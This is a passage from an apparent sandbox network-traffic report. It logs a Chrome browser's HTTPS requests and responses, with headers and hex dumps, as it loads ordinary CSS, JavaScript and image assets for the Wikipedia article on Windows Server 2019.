                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC949INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:49:07 GMT
                                                                                                                                                                                                                                      etag: W/"ncsa1"
                                                                                                                                                                                                                                      expires: Tue, 07 Jan 2025 17:54:06 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=300, s-maxage=300, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: text/css; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/5205
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 7407
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC7407INData Raw: 63 69 74 65 2c 64 66 6e 7b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 6e 68 65 72 69 74 7d 71 7b 71 75 6f 74 65 73 3a 27 22 27 20 27 22 27 20 22 27 22 20 22 27 22 7d 62 6c 6f 63 6b 71 75 6f 74 65 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e 3a 31 65 6d 20 30 3b 70 61 64 64 69 6e 67 3a 30 20 34 30 70 78 7d 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 35 25 7d 2e 6d 77 2d 62 6f 64 79 2d 63 6f 6e 74 65 6e 74 20 73 75 62 2c 2e 6d 77 2d 62 6f 64 79 2d 63 6f 6e 74 65 6e 74 20 73 75 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 38 30 25 7d 2e 6e 73 2d 74 61 6c 6b 20 2e 6d 77 2d 62 6f 64 79 2d 63 6f 6e 74 65 6e 74 20 64 64 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 2e 34 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 2e 34 65 6d 7d 2e 63 6c 69 65
                                                                                                                                                                                                                                      Data Ascii: cite,dfn{font-style:inherit}q{quotes:'"' '"' "'" "'"}blockquote{overflow:hidden;margin:1em 0;padding:0 40px}small{font-size:85%}.mw-body-content sub,.mw-body-content sup{font-size:80%}.ns-talk .mw-body-content dd{margin-top:0.4em;margin-bottom:0.4em}.clie


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      35192.168.2.1649762185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC805OUTGET /static/images/mobile/copyright/wikipedia-wordmark-en.svg HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC926INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 15:51:27 GMT
                                                                                                                                                                                                                                      expires: Tue, 06 Jan 2026 21:12:50 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      etag: W/"181a-62309f0dda7c0"
                                                                                                                                                                                                                                      last-modified: Thu, 26 Sep 2024 18:31:03 GMT
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/svg+xml
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      age: 7283
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/287390
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 6170
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC6170INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 30 20 31 38 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 30 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 6e 6f 6e 7a 65 72 6f 22 20 64 3d 22 6d 31 38 2e 33 33 39 20 30 20 2e 31 39 39 2e 30 30 31 68 2e 33 37 35 6c 2e 31 37 34 2e 30 30 31 68 2e 33 31 35 6c 2e 31 33 38 2e 30 30 31 2e 33 32 33 2e 30 30 31 48 32 30 2e 30 33 34 6c 2e 30 35 38 2e 30 35 33 76 2e 35 63 30 20 2e 31 33 39 2d 2e 30 37 38 2e 32 30 38 2d 2e 32 33 31 2e 32 30 38 2d 2e 37 35 33 2e 30 33 35 2d 2e 39 30 38 2e 31 31 2d 31 2e 31 38 34 2e 35 30 37 2d 2e 31 35 2e 32 31 36 2d 2e 34 34 37 2e 36 38 2d 2e 37 35 35 20 31 2e 32 30 34 4c
                                                                                                                                                                                                                                      Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 120 18"><path fill="#000" fill-rule="nonzero" d="m18.339 0 .199.001h.375l.174.001h.315l.138.001.323.001H20.034l.058.053v.5c0 .139-.078.208-.231.208-.753.035-.908.11-1.184.507-.15.216-.447.68-.755 1.204L


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      36192.168.2.1649760185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC759OUTGET /w/load.php?lang=en&modules=startup&only=scripts&raw=1&skin=vector-2022 HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC1029INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:49:18 GMT
                                                                                                                                                                                                                                      etag: W/"13tqr"
                                                                                                                                                                                                                                      expires: Tue, 07 Jan 2025 17:49:28 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=300, s-maxage=300, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=startup&only=scripts&skin=vector-2022&sourcemap=1&version=13tqr
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/4785
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 62904
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC13765INData Raw: 66 75 6e 63 74 69 6f 6e 20 69 73 43 6f 6d 70 61 74 69 62 6c 65 28 29 7b 72 65 74 75 72 6e 21 21 28 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 69 6e 20 64 6f 63 75 6d 65 6e 74 26 26 27 6c 6f 63 61 6c 53 74 6f 72 61 67 65 27 69 6e 20 77 69 6e 64 6f 77 26 26 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 3d 3d 3d 27 66 75 6e 63 74 69 6f 6e 27 26 26 50 72 6f 6d 69 73 65 2e 70 72 6f 74 6f 74 79 70 65 5b 27 66 69 6e 61 6c 6c 79 27 5d 26 26 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 27 28 61 20 3d 20 30 29 20 3d 3e 20 61 27 29 3b 72 65 74 75 72 6e 20 74 72 75 65 3b 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 7d 7d 28 29 29 26 26 2f 2e 2f 67 2e 66 6c 61 67 73 3d 3d 3d 27 67 27 29 3b 7d 69 66 28 21
                                                                                                                                                                                                                                      Data Ascii: function isCompatible(){return!!('querySelector'in document&&'localStorage'in window&&typeof Promise==='function'&&Promise.prototype['finally']&&(function(){try{new Function('(a = 0) => a');return true;}catch(e){return false;}}())&&/./g.flags==='g');}if(!
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC16320INData Raw: 42 61 73 65 29 2e 6c 65 6e 67 74 68 2b 32 33 3b 76 61 72 20 6c 65 6e 67 74 68 3d 30 3b 6d 6f 64 75 6c 65 4d 61 70 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6d 6f 64 75 6c 65 73 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 76 61 72 20 6c 61 73 74 44 6f 74 49 6e 64 65 78 3d 6d 6f 64 75 6c 65 73 5b 69 5d 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 27 2e 27 29 2c 70 72 65 66 69 78 3d 6d 6f 64 75 6c 65 73 5b 69 5d 2e 73 6c 69 63 65 28 30 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 0a 6c 61 73 74 44 6f 74 49 6e 64 65 78 29 29 2c 73 75 66 66 69 78 3d 6d 6f 64 75 6c 65 73 5b 69 5d 2e 73 6c 69 63 65 28 6c 61 73 74 44 6f 74 49 6e 64 65 78 2b 31 29 2c 62 79 74 65 73 41 64 64 65 64 3d 6d 6f 64 75 6c 65 4d 61 70 5b 70 72 65
                                                                                                                                                                                                                                      Data Ascii: Base).length+23;var length=0;moduleMap=Object.create(null);for(var i=0;i<modules.length;i++){var lastDotIndex=modules[i].lastIndexOf('.'),prefix=modules[i].slice(0,Math.max(0,lastDotIndex)),suffix=modules[i].slice(lastDotIndex+1),bytesAdded=moduleMap[pre
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC2683INData Raw: 69 61 77 69 6b 69 2e 77 69 64 67 65 74 73 2e 53 69 7a 65 46 69 6c 74 65 72 57 69 64 67 65 74 22 2c 22 31 62 71 37 6d 22 2c 5b 31 38 33 2c 32 30 34 5d 5d 2c 5b 22 6d 65 64 69 61 77 69 6b 69 2e 77 69 64 67 65 74 73 2e 53 69 7a 65 46 69 6c 74 65 72 57 69 64 67 65 74 2e 73 74 79 6c 65 73 22 2c 22 6a 6f 7a 68 71 22 5d 2c 5b 22 6d 65 64 69 61 77 69 6b 69 2e 77 69 64 67 65 74 73 2e 4d 65 64 69 61 53 65 61 72 63 68 22 2c 22 31 38 35 63 78 22 2c 5b 34 37 2c 32 30 34 5d 5d 2c 5b 22 6d 65 64 69 61 77 69 6b 69 2e 77 69 64 67 65 74 73 2e 54 61 62 6c 65 22 2c 22 68 6c 72 69 32 22 2c 5b 32 30 34 5d 5d 2c 5b 22 6d 65 64 69 61 77 69 6b 69 2e 77 69 64 67 65 74 73 2e 54 61 67 4d 75 6c 74 69 73 65 6c 65 63 74 57 69 64 67 65 74 22 2c 22 31 79 35 68 71 22 2c 5b 32 30 34 5d 5d
                                                                                                                                                                                                                                      Data Ascii: iawiki.widgets.SizeFilterWidget","1bq7m",[183,204]],["mediawiki.widgets.SizeFilterWidget.styles","jozhq"],["mediawiki.widgets.MediaSearch","185cx",[47,204]],["mediawiki.widgets.Table","hlri2",[204]],["mediawiki.widgets.TagMultiselectWidget","1y5hq",[204]]
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC16320INData Raw: 6c 65 73 73 2e 6a 73 22 2c 22 31 6a 32 30 6c 22 5d 2c 5b 22 65 78 74 2e 74 69 6d 65 6c 69 6e 65 2e 73 74 79 6c 65 73 22 2c 22 31 6f 73 6a 37 22 5d 2c 5b 22 65 78 74 2e 77 69 6b 69 68 69 65 72 6f 22 2c 22 68 64 34 33 71 22 5d 2c 5b 0a 22 65 78 74 2e 77 69 6b 69 68 69 65 72 6f 2e 73 70 65 63 69 61 6c 22 2c 22 31 66 6d 36 67 22 2c 5b 32 34 36 2c 31 39 2c 32 30 31 5d 5d 2c 5b 22 65 78 74 2e 77 69 6b 69 68 69 65 72 6f 2e 76 69 73 75 61 6c 45 64 69 74 6f 72 22 2c 22 31 6a 6c 6e 7a 22 2c 5b 34 33 37 5d 5d 2c 5b 22 65 78 74 2e 63 68 61 72 69 6e 73 65 72 74 22 2c 22 31 73 7a 6b 6a 22 2c 5b 32 34 5d 5d 2c 5b 22 65 78 74 2e 63 68 61 72 69 6e 73 65 72 74 2e 73 74 79 6c 65 73 22 2c 22 31 37 68 63 37 22 5d 2c 5b 22 65 78 74 2e 63 69 74 65 2e 73 74 79 6c 65 73 22 2c 22
                                                                                                                                                                                                                                      Data Ascii: less.js","1j20l"],["ext.timeline.styles","1osj7"],["ext.wikihiero","hd43q"],["ext.wikihiero.special","1fm6g",[246,19,201]],["ext.wikihiero.visualEditor","1jlnz",[437]],["ext.charinsert","1szkj",[24]],["ext.charinsert.styles","17hc7"],["ext.cite.styles","
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC13816INData Raw: 32 32 35 5d 5d 2c 5b 22 73 78 2e 70 75 62 6c 69 73 68 69 6e 67 2e 66 6f 6c 6c 6f 77 75 70 22 2c 22 31 39 31 62 6c 22 2c 5b 36 32 31 2c 36 32 30 2c 32 37 5d 5d 2c 5b 22 65 78 74 2e 63 78 2e 61 72 74 69 63 6c 65 74 6f 70 69 63 73 22 2c 22 71 6e 32 31 70 22 5d 2c 5b 22 6d 77 2e 63 78 33 22 2c 22 70 63 33 30 62 22 2c 5b 36 31 37 2c 36 32 31 2c 36 32 30 2c 32 38 5d 5d 2c 5b 22 6d 77 2e 63 78 33 2e 76 65 22 2c 22 31 6e 38 6b 6b 22 2c 5b 32 35 34 2c 34 31 33 5d 5d 2c 5b 22 6d 77 2e 63 78 2e 75 74 69 6c 22 2c 22 72 68 33 62 32 22 2c 5b 36 31 34 2c 37 35 5d 5d 2c 5b 22 6d 77 2e 63 78 2e 53 69 74 65 4d 61 70 70 65 72 22 2c 22 61 33 78 73 30 22 2c 5b 36 31 34 2c 34 37 2c 37 34 2c 37 35 5d 5d 2c 5b 22 6d 77 2e 63 78 2e 75 69 2e 4c 61 6e 67 75 61 67 65 46 69 6c 74 65
                                                                                                                                                                                                                                      Data Ascii: 225]],["sx.publishing.followup","191bl",[621,620,27]],["ext.cx.articletopics","qn21p"],["mw.cx3","pc30b",[617,621,620,28]],["mw.cx3.ve","1n8kk",[254,413]],["mw.cx.util","rh3b2",[614,75]],["mw.cx.SiteMapper","a3xs0",[614,47,74,75]],["mw.cx.ui.LanguageFilte


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      37192.168.2.1649759185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC782OUTGET /static/images/icons/wikipedia.png HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC899INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Mon, 06 Jan 2025 22:14:19 GMT
                                                                                                                                                                                                                                      etag: "3484-62309f0dda7c0"
                                                                                                                                                                                                                                      expires: Mon, 05 Jan 2026 22:44:30 GMT
                                                                                                                                                                                                                                      cache-control: max-age=31536000
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      last-modified: Thu, 26 Sep 2024 18:31:03 GMT
                                                                                                                                                                                                                                      content-length: 13444
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                      age: 70712
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/816288
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC13444INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 64 00 00 00 64 08 06 00 00 00 70 e2 95 54 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 34 3b 49 44 41 54 78 01 ec 99 05 54 5b 5d f6 c5 df 5f c6 dd dd dd dd dd dd a7 53 77 57 be ba bb 7b 8b 3b 45 23 44 20 4a 88 12 ac b8 43 02 94 c6 ea f6 b9 c3 99 7d 6e e0 4d 16 f5 96 71 de 5a bf 26 8d bd f7 ee be fb ec 73 2f d2 f8 31 7e 8c 1f e3 c7 f8 31 7e 8c 1f e3 c7 6d 8f c6 c6 c6 97 78 bd d5 7f 72 b9 aa 3e 05 a4 86 86 86 5f 9a cd e6 2f 03 e9 df 8d a4 a4 a4 0f 67 67 e7 2f cb cb 57 a4 e5 17 2a 9b 55 1a cd 2f 81 f4 f7 62 cc 7f d0 ef 1f f8 4e 5b 5b fb 39 b7 db 43 ad 6d ed 67 7c 7e bf df 6a 2b 27 55 b1 e6 1a 90 fe 95 c9 c9 71 bf 3c 29 33 f3 c3 39 39 39 af 07 12 78 79 4e 6e 41 20 37 bf 90 b4 7a 03 15 6b 4b 70
                                                                                                                                                                                                                                      Data Ascii: PNGIHDRddpTgAMAa4;IDATxT[]_SwW{;E#D JC}nMqZ&s/1~1~mxr>_/gg/W*U/bN[[9Cmg|~j+'Uq<)3999xyNnA 7zkKp


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      38192.168.2.1649763185.15.59.2404436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC706OUTGET /wikipedia/commons/thumb/2/2f/Windows_Server_2019_logo_%28official%29.svg/200px-Windows_Server_2019_logo_%28official%29.svg.png HTTP/1.1
                                                                                                                                                                                                                                      Host: upload.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC1076INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      content-type: image/png
                                                                                                                                                                                                                                      content-disposition: inline;filename*=UTF-8''Windows_Server_2019_logo_%28official%29.svg.png
                                                                                                                                                                                                                                      last-modified: Wed, 12 Jun 2024 21:08:02 GMT
                                                                                                                                                                                                                                      content-length: 2842
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:52:51 GMT
                                                                                                                                                                                                                                      server: envoy
                                                                                                                                                                                                                                      etag: 8087241e0374ee22ab2b832f25325bf5
                                                                                                                                                                                                                                      age: 0
                                                                                                                                                                                                                                      x-cache: cp3075 hit, cp3075 miss
                                                                                                                                                                                                                                      x-cache-status: hit-local
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-local", host;desc="cp3075"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache
                                                                                                                                                                                                                                      timing-allow-origin: *
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:51 UTC2842INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 19 08 03 00 00 00 43 e4 91 26 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 02 e5 50 4c 54 45 00 00 00 00 00 aa 00 17 87 00 16 88 00 15 89 00 14 8a 00 0f 87 00 14 87 00 16 88 00 15 89 00 15 89 00 15 8a 00 15 89 00 15 88 00 17 8b 00 15 88 00 15 89 00 15 8a 00 14 89 00 15 89 00 15 89 00 16 8a 00 14 89 00 16 88 00 16 89 00 15 89 00 15 89 00 15 89 00 14 88 00 15 88 00 15 8a 00 12 8d 00 13 87 00 15 89 00 15 80 00 15 8a 00 12 92 00 16 88 00 15 89 00 24 92 00 00 80 00 15 89 00 00 80 00 15 89 00 14 89 00 14 85 00 00 ff 00 16 8a 00 15 89 00 15 89 00 15 89 00
                                                                                                                                                                                                                                      Data Ascii: PNGIHDRC&gAMAa cHRMz&u0`:pQ<PLTE$


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      39192.168.2.1649765185.15.59.2404436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
